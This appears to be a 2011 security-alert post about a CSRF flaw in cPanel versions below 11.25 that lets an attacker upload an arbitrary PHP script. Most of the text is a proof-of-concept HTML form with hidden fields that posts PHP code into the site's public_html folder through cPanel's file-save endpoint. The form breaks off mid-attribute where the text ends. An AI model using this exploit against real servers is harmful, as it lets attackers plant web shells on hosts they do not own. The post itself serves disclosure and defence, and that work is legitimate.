Security Alert : cPanel 11.25 CSRF vulnerability to upload any php Script !
May 28, 2011
Security Alert : cPanel 11.25 CSRF vulnerability to upload any php Script ! cPanel versions below and excluding 11.25 , are vulnerable to CSRF which leads to uploading a PHP script of the attackers liking. If you have turned off security tokens and referrer security check, no matter what version you are using, you are vulnerable as well. Proof Of Concept : <html> < form name = "editform" action=" https://localhost:2082/frontend/x3/err/savefile.html" method = POST onSubmit = "return loadfdata();" > < input type = "hidden" id = "codepage" class = "codepress html" name = "page" value="<?php echo 'ninjashell'; ?>"> < input type = "hidden" name = "domain" value = "localhost" > < input type = "hidden" value = "public_html/" name = "dir" > < input type = &qu